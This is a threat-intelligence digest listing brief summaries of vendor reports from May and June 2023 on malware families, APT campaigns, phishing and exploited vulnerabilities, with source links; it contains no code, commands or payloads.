- JPCERT/CC has shared details of attacks that infected routers in Japan with malware around February 2023. Their analysis blog describes the attack confirmed by JPCERT/CC and the GobRAT malware used in it. Based on JPCERT’s analysis, the attacker initially targets a router whose WebUI is exposed to the public, executes scripts on it, possibly by exploiting vulnerabilities, and finally infects it with GobRAT.
—
- Intel Source:
- Group-IB
- Intel Name:
- Dark_Pink_APT_Group_Return_With_5_Victims_in_New_Countries
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Group-IB researchers have identified new tools, exfiltration mechanisms, and victims in new industries, in countries that Dark Pink has never targeted before. It has continued to attack government, military, and non-profit organizations in the Asia-Pacific region, expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium.
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Distributing_Malicious_Job_Application_Letters
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes.
—
- Intel Source:
- Barracuda
- Intel Name:
- Zero_Day_Flaw_in_Barracuda_Email_Security_Gateway_Appliances
- Date of Scan:
- 2023-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Barracuda have urged their customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
—
- Intel Source:
- Cofense
- Intel Name:
- The_Return_of_Vacation_Request_Phishing_Emails
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sends an email to a user that claims to be from the ‘HR Department’ and provides the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- Lumen
- Intel Name:
- Qakbot_Retool_Reinfect_Recycle
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- Lumen researchers observed recent Qakbot campaigns to gain insight into their network structure, and gained key insights into the methods that support Qakbot’s reputation as an evasive and tenacious threat.
Source:
https://blog.lumen.com/qakbot-retool-reinfect-recycle/?utm_source=substack&utm_medium=email
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examination_of_TargetCompany_Ransomware
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- TrendMicro researchers have found that each major update of the TargetCompany ransomware entailed a change in the encryption algorithm and different decryptor characteristics. These are accompanied by a change in file name extensions, hence the evolution of the names by which the ransomware group is known.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- ITG10_Group_Targeting_South_Korean_Entities
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- IBM Security researchers have uncovered documents that are most likely part of a phishing campaign mimicking credible senders, orchestrated by a group X-Force refers to as ITG10, and aimed at delivering RokRAT malware.
Source:
https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/
—
- Intel Source:
- Recorded Future
- Intel Name:
- North_Korean_TAG71_Group_Spoofs_Asian_and_US_Financial_Institutions
- Date of Scan:
- 2023-06-07
- Impact:
- MEDIUM
- Summary:
- Recorded Future researchers have discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. They refer to the group behind this activity as Threat Activity Group 71 (TAG-71). They also identified 74 domains resolving to 5 IP addresses, as well as 6 malicious files, in the most recent cluster of activity from September 2022 to March 2023.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Korean_Users_via_Malicious_Document_Files
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered an ongoing campaign associated with the notorious ransomware group LockBit. It has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.
Source:
https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Social_Engineering_Campaign_Aims_to_Steal_Credentials_and_Gather_Strategic_Intelligence
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have tracked a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberespionage_Against_Ukrainian_State_Bodies_and_Media
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified that files (.HTA, .EXE, .RAR, .LNK) are being distributed by unknown persons via e-mail and instant messengers; launching them leads to the victim’s computer being infected with the LONEPAGE malicious program.
—
- Intel Source:
- Akamai
- Intel Name:
- Hackers_Take_Over_Legitimate_Sites_to_Host_Credit_Card_Stealer_Scripts
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Akamai researchers have observed a new Magecart credit card stealing campaign that hijacks legitimate sites to act as “makeshift” command and control (C2) servers to inject and hide the skimmers on targeted eCommerce sites.
Source:
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
—
- Intel Source:
- Huntress
- Intel Name:
- MOVEit_Transfer_Critical_Vulnerability
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Researchers from Huntress have investigated the exploitation of the critical MOVEit Transfer vulnerability CVE-2023-34362.
Source:
https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
—
- Intel Source:
- Splunk
- Intel Name:
- Detection_and_Analysis_of_RedLine_Stealer
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- RedLine Stealer is a malware strain designed to steal sensitive information from compromised systems. It is typically distributed through phishing emails, social engineering tactics, and malicious URL links.
—
- Intel Source:
- Perception Point
- Intel Name:
- Diving_Deep_into_Red_Deer
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- Researchers from Perception Point have deeply analyzed a malware campaign crafted specifically for the Israeli audience called Red Deer.
Source:
https://perception-point.io/blog/operation-red-deer/
—
- Intel Source:
- Esentire
- Intel Name:
- Return_of_GuLoader_VBScript_Variant_with_PowerShell_Updates
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- GuLoader is a sophisticated malware loader which has heavily abused tax-themed lures. TRU reported on ongoing GuLoader activity using tax-themed lures and decoy files, and identified an updated VBScript GuLoader variant across multiple customers.
Source:
https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates
—
- Intel Source:
- VMware
- Intel Name:
- Detection_of_Carbon_Black_TrueBot_Malware
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery.
Source:
https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html
—
- Intel Source:
- Menlo Security
- Intel Name:
- Analysis_of_XeGroups_Attack_Techniques_Detected
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- XeGroup’s tactics, techniques, and procedures have been detailed in a report by Volexity, which suggests that the group may be associated with other cybercriminal organizations and may have links to state-sponsored hacking groups.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Chinese_Hackers_Using_Modified_Cobalt_Strike_Variant_to_Attack_Taiwanese_Critical_Infrastructure
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have identified a malicious web server, very likely operated by a Chinese threat actor, used to target Taiwanese government entities, including critical infrastructure.
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Camaro_Dragon_Strikes_with_a_New_TinyNote_Backdoor
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Checkpoint researchers have observed that a Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that’s designed to meet its intelligence-gathering goals.
Source:
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/
—
- Intel Source:
- Symantec
- Intel Name:
- Lancefly_APT_Targets_Governments_Aviation_and_Organizations_with_Custom_Backdoors
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that the Lancefly APT group has been using custom backdoors for several years to target organizations in South and Southeast Asia.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Who_and_What_Threatens_the_World_Column_exe_malware
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- The ReversingLabs research team has identified a novel attack on PyPI using compiled Python code to evade detection, possibly the first attack to take advantage of PYC file direct execution.
—
- Intel Source:
- Talos
- Intel Name:
- New_unidentified_botnet_campaign_Horabot
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cisco Talos researchers have identified a previously unidentified botnet program, which Talos is calling “Horabot,” that delivers a known banking trojan and spam tool onto victim machines in a campaign.
Source:
https://blog.talosintelligence.com/new-horabot-targets-americas/
—
- Intel Source:
- Securelist
- Intel Name:
- Previously_unknown_malware_attacked_IOS_devices
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- While monitoring the network traffic of the Securelist corporate Wi-Fi network, the researchers observed suspicious activity that originated from several iOS-based phones. Because it was impossible to inspect modern iOS devices from the inside, the researchers created offline backups of the devices in question, inspected them using the Mobile Verification Toolkit’s mvt-ios and discovered traces of compromise. They called this campaign “Operation Triangulation”.
Source:
https://securelist.com/operation-triangulation/109842/
—
- Intel Source:
- Blackberry
- Intel Name:
- Operation_CMDStealer
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified an unknown financially motivated threat actor, very likely from Brazil, that is targeting Spanish- and Portuguese-speaking victims with the goal of stealing online banking access. The victims are primarily in Portugal, Mexico, and Peru. This threat actor employs tactics such as LOLBaS (Living Off the Land Binaries and Scripts), along with CMD-based scripts, to carry out its malicious activities.
Source:
https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico
—
- Intel Source:
- Sentinelone
- Intel Name:
- Operation_Magalenha
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking a campaign over the first quarter of 2023 targeting users of Portuguese financial institutions, including government, government-backed, and private institutions.
—
- Intel Source:
- Cyble
- Intel Name:
- SharpPanda_APT_Campaign_Expands
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cyble researchers observed an ongoing campaign by the SharpPanda APT. This APT group has a history of targeting government officials, particularly in Southeast Asian countries. This latest campaign specifically targets high-level government officials from G20 nations.
Source:
https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_Malware_Disguised_as_Hancom_Office_Document_File_Detected
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as Hancom Office document files. The malware that is being distributed is named “Who and What Threatens the World (Column).exe” and is designed to deceive users by using an icon that is similar to that of Hancom Office.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- The_attacks_against_Apache_NiFi
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- On May 19th, ISC SANS analyst Johannes Ullrich noted a rapid increase in requests related to Apache NiFi. Apache NiFi describes itself as “an easy-to-use, powerful, and reliable system to process and distribute data.” At least one actor is actively scanning the Internet for unprotected instances of Apache NiFi. That threat actor adds processors in Apache NiFi to install a crypto coin miner and then perform lateral movement by searching the server for SSH credentials.
—
- Intel Source:
- AT&T
- Intel Name:
- A_new_Quasar_variant_SeroXen_RAT
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AT&T Alien Labs researchers reviewed recent malicious samples of a new Quasar variant observed by Alien Labs in the wild, SeroXen. This new RAT is a modified branch of the open-source version, adding some modifications and features to the original RAT.
Source:
https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale
—
- Intel Source:
- Cleafy
- Intel Name:
- The_deeper_techniques_of_sLoad_Ramnit_and_drIBAN
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Cleafy analysts shared in their blog the deeper techniques that made them connect the sLoad, Ramnit, and drIBAN malware families. The analysts provided some Ramnit characteristics and the techniques used to perform the MiTB attack and deliver its injection kit.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter-2
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_connections_between_BlackSuit_and_Royal_ransomware
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro analyzed BlackSuit ransomware and how it compares to Royal ransomware. Several researchers on Twitter discovered a new ransomware family called BlackSuit that targeted both Windows and Linux users. Some Twitter posts also mentioned connections between BlackSuit and Royal, which triggered Trendmicro researchers’ interest. Trendmicro researchers shared in their blog their analysis of a Windows 32-bit sample of the ransomware from Twitter.
—
- Intel Source:
- Eclypsium
- Intel Name:
- Gigabyte_App_Center_Backdoor_risk
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Recently, the Eclypsium platform observed suspicious backdoor behavior inside Gigabyte systems. Its detectors identified a new, previously unknown supply chain threat, where legitimate third-party technology products or updates have been compromised. The Eclypsium analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable file during the system startup process, and this executable then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features such as the Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors, and even firmware implants such as Sednit LoJax, MosaicRegressor, and Vector-EDK.
Source:
https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- AceCryptor_cruptor_operation
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- ESET researchers shared details about a widespread cryptor, operating as a cryptor-as-a-service, used by tens of malware families.
Source:
https://www.welivesecurity.com/2023/05/25/shedding-light-acecryptor-operation/
—
- Intel Source:
- ISC. SANS
- Intel Name:
- DocuSign_email_opens_to_script_based_infection
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Twitter user @0xToxin has recently discovered malicious emails imitating DocuSign with HTML attachments.
—
- Intel Source:
- Intezer
- Intel Name:
- CryptoClippy_actively_expanding_its_capabilities
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Intezer analysts shared details indicating that the threat actors behind CryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services commonly used in Brazil.
Source:
https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/
—
- Intel Source:
- Inky
- Intel Name:
- ChatGPT_safisticated_Phishing_Scam
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Inky researchers observed that cybercriminals have begun impersonating the ChatGPT brand in a sophisticated, personalized phishing campaign.
Source:
https://www.inky.com/en/blog/fresh-phish-chatgpt-impersonation-fuels-a-clever-phishing-scam
—
- Intel Source:
- Cyble
- Intel Name:
- Ducktail_Malware_targets_a_high_profile_accounts
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researchers recently discovered Ducktail malware that specifically targets Marketing and HR professionals. The malware is designed to extract browser cookies and take advantage of social media sessions to steal sensitive information from the victim’s social media account. The purpose of the malware operation is to gain control of social media business accounts with adequate access privileges. TAs then use their acquired access to run advertisements for their financial gain.
—
- Intel Source:
- NSA / Secureworks
- Intel Name:
- Chinese_APT_Group_BRONZE_SILHOUETTE_Targeting_US_Government_and_Defense_Organizations
- Date of Scan:
- 2023-05-30
- Impact:
- MEDIUM
- Summary:
- SecureWorks researchers have discovered a cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Invicta_Stealer_Spreading
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- The Cyble research lab team discovered a new stealer called Invicta Stealer. The developer in charge of this malware is heavily involved on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.
Source:
https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/
—
- Intel Source:
- Cyble
- Intel Name:
- Obsidian_ORB_Ransomware_Demanding_Payment_With_Gift_Cards
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researchers have come across a new and unique ransomware strain named Obsidian ORB. Extensive analysis has revealed compelling evidence that suggests a significant correlation between Obsidian ORB Ransomware and the underlying source code of the notorious Chaos ransomware.
Source:
https://blog.cyble.com/2023/05/25/obsidian-orb-ransomware-demands-gift-cards-as-payment/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_Targeting_Users_of_Portuguese_Financial_Institutions
- Date of Scan:
- 2023-05-29
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group. The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.
—
- Intel Source:
- CADO Security
- Intel Name:
- Legion_Malware_Targeting_SSH_Servers_and_AWS_Credentials
- Date of Scan:
- 2023-05-29
- Impact:
- LOW
- Summary:
- CADO Security researchers have identified an updated version of the commodity malware called Legion that comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
Source:
https://www.cadosecurity.com/updates-to-legion-a-cloud-credential-harvester-and-smtp-hijacker/
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_Delivering_via_Encrypted_Messages
- Date of Scan:
- 2023-05-28
- Impact:
- MEDIUM
- Summary:
- Trustwave researchers have observed phishing attacks that use a combination of compromised Microsoft 365 accounts and .rpmsg encrypted emails to deliver the phishing message.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Ongoing_Kimsuky_Campaign_Utilizing_Custom_Reconnaissance_Toolkit
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has been tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks.
Source:
https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/
—
- Intel Source:
- Cofense
- Intel Name:
- Resurgence_of_Vacation_Request_Phishing_Emails_in_Summer_Time_Scams
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sent an email to a user that claimed to be from the ‘HR Department’ and provided the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Technical_Examination_of_Pikabot
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new malware trojan named Pikabot, which emerged in early 2023 and consists of two components: a loader and a core module.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
—
- Intel Source:
- ASEC
- Intel Name:
- Link_Found_Between_Korean_VPN_Installations_and_MeshAgent_Infections
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded.
—
- Intel Source:
- ClearSky
- Intel Name:
- Israeli_Logistics_Industry_attacked_by_hackers
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- ClearSky Cyber Security researchers have discovered a watering hole attack on at least eight Israeli websites. The attack was most likely orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The infected sites collect preliminary user information through a script.
—
- Intel Source:
- Mandiant
- Intel Name:
- COSMICENERGY_new_OT_Malware_related_to_Russia
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- Mandiant discovered a new operational technology (OT) / industrial control system (ICS) malware, named COSMICENERGY, uploaded by a threat actor in Russia. The malware is capable of causing electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly used in electric transmission and distribution operations in Europe, the Middle East, and Asia.
Source:
https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response
—
- Intel Source:
- Microsoft, CISA
- Intel Name:
- Volt_Typhoon_stealthy_activity
- Date of Scan:
- 2023-05-27
- Impact:
- HIGH
- Summary:
- Microsoft has discovered stealthy malicious activity focused on credential access and network system discovery, attacking critical infrastructure organizations in the United States. The attack is carried out by Volt Typhoon, a state-sponsored actor based in China that focuses on espionage and information stealing. Microsoft assesses that this Volt Typhoon campaign is pursuing the development of capabilities that could disrupt critical communications infrastructure between the United States and the Asia region during future crises.
—
- Intel Source:
- Cluster25
- Intel Name:
- Return_of_BlackByte_Ransomware_with_New_Technology_Version
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- The Cluster25 Threat Intel Team describes BlackByte as a Ransomware-as-a-Service group known for the use of the homonymous malware, which is constantly updated and spread in different variants. The team used an IDAPython script to retrieve all invocations of the functions responsible for the dynamic loading of the APIs, in order to continue with the static analysis of the malware.
Source:
https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt
—
- Intel Source:
- Checkpoint
- Intel Name:
- Agrius_threat_actor_attacks_against_Israel
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- Agrius, a threat actor believed to be Iranian, keeps attacking Israeli targets, hiding destructive activity behind the appearance of ransomware attacks. Recently the group deployed Moneybird, a new ransomware written in C++. Despite operating under a new group name, Moneybird, this is yet another Agrius alias.
—
- Intel Source:
- Cyble
- Intel Name:
- Over_200_Corporate_Victims_Hit_by_New_Ransomware_Wave
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) found that the increasing adoption of double extortion by ransomware groups is an alarming trend. CRIL is witnessing a surge in ransomware attacks that not only encrypt valuable corporate data but also involve the threat of public exposure unless the attackers’ demands are fulfilled.
Source:
https://blog.cyble.com/2023/05/23/new-ransomware-wave-engulfs-over-200-corporate-victims/
—
- Intel Source:
- Cyble
- Intel Name:
- Cyber_Crime_Forum_Offers_DDoS_As_A_Service_by_Russian_Hacktivists
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has made a significant discovery on a cybercrime forum – a newly identified malware strain called “MDBotnet.” CRIL’s analysis suggests that this malware originates from a Threat Actor (TA) linked to Russia.
Source:
https://blog.cyble.com/2023/05/23/new-mdbotnet-unleashes-ddos-attacks/
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_Software
- Date of Scan:
- 2023-05-26
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified an infection chain that uses about a hundred fake cracked-software catalog websites, which redirect through several links before downloading the payload hosted on file-sharing platforms such as GitHub.
—
- Intel Source:
- Securelist
- Intel Name:
- Diving_Deep_into_GoldenJackal_APT_Group
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Securelist researchers have monitored the GoldenJackal APT Group since mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo, and JackalScreenWatcher.
Source:
https://securelist.com/goldenjackal-apt-group/109677/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails_Detected
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified that malware developers strive to create new threats that can bypass the defenses of antivirus products. “Packing” and “crypting” services are specifically designed to resist analysis. GuLoader is one of the most prominent services cybercriminals use to evade antivirus detection.
Source:
https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/
—
- Intel Source:
- ASEC
- Intel Name:
- StrelaStealer_Malware_Targeting_Spanish_Users
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the StrelaStealer Infostealer is distributed to Spanish users. It was initially discovered around November 2022 and distributed as an attachment to spam emails.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Targeting_Windows_IIS_Web_Servers
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the Lazarus group, which is known to receive support on a national scale, is carrying out attacks against Windows IIS web servers.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Espionage_Activity_UAC_0063
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- CERT-UA researchers have observed that on 04/18/2023 and 04/20/2023, e-mails were sent to the department’s e-mail address from the official mailbox of the Embassy of Tajikistan in Ukraine (probably as a result of the latter being compromised). The first contained an attachment in the form of a document with a macro, and the second a reference to the same document.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the DarkCloud malware is distributed via spam email. It is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud.
—
- Intel Source:
- Fortinet
- Intel Name:
- Middle_East_Targeted_by_New_Kernel_Driver_Exploit
- Date of Scan:
- 2023-05-24
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered suspicious executables that make use of open-source tools and frameworks. One of the things that we keep an eye out for is tools that use the Donut project. Donut is a position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters.
Source:
https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries
—
- Intel Source:
- Esentire
- Intel Name:
- BatLoader_Campaign_Impersonates_ChatGPT_and_Midjourney_to_Deliver_Redline_Stealer
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Esentire researchers have observed that threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer.
Source:
https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks
—
- Intel Source:
- DFIR Report
- Intel Name:
- IcedID_Macro_Ends_in_Nokoyawa_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Researchers from DFIR Report have identified an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian organizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target organizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on documents downloaded from the internet.
Source:
https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Signed_Kernel_Driver_Deployed_BlackCat_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have analyzed the BlackCat ransomware incident that occurred in February 2023, where they observed a new capability, mainly used for the defense evasion phase, that overlaps with the earlier malicious drivers disclosed by the three vendors.
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Targeting_Vulnerable_WordPress_Elementor_plugin_Versions
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified that several versions of the WordPress plugin Essential Addons for Elementor impacted by the now-addressed critical CVE-2023-32243 vulnerability are being actively scanned and targeted by threat actors following the release of a proof-of-concept exploit.
—
- Intel Source:
- Sophos
- Intel Name:
- Brute_Ratel_remains_rare_and_targeted
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The commercial attack tool’s use by threat actors has faded after an initial flurry, while Cobalt Strike remains the go-to post-exploitation tool for many.
Source:
https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/
—
- Intel Source:
- Cyble
- Intel Name:
- CapCut_s_Video_to_Deliver_Multiple_Stealers
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- Cyble researchers recently discovered a couple of phishing websites disguised as video editing software. These fake sites lure users into downloading and executing various types of malware families such as stealers, RATs, etc. In these campaigns, Threat Actors targeted the CapCut video editing tool, a product of ByteDance, the same parent company that owns TikTok.
Source:
https://blog.cyble.com/2023/05/19/capcut-users-under-fire/
—
- Intel Source:
- Cyble
- Intel Name:
- AndoryuBot_s_DDOS_wild_behavior
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The Cyble group observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot. This incident indicates that Threat Actors are actively looking for vulnerable Ruckus assets for exploitation purposes. AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.
Source:
https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Distributing_DarkCrystal_RAT_by_fake_Desktop_Authenticator_App
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The Bushidotoken researcher recently discovered a threat actor campaign that is using fake websites to distribute malware. This TTP seems to be on the rise. A suspected Russia-based threat actor tried to duplicate the website of a legitimate open-source desktop app called Steam Desktop Authenticator, which is simply a convenient desktop version of the mobile authenticator app.
Source:
https://blog.bushidotoken.net/2023/05/fake-steam-desktop-authenticator-app.html
—
- Intel Source:
- Reversing Labs
- Intel Name:
- TurkoRat_found_hiding_in_the_npm_package
- Date of Scan:
- 2023-05-19
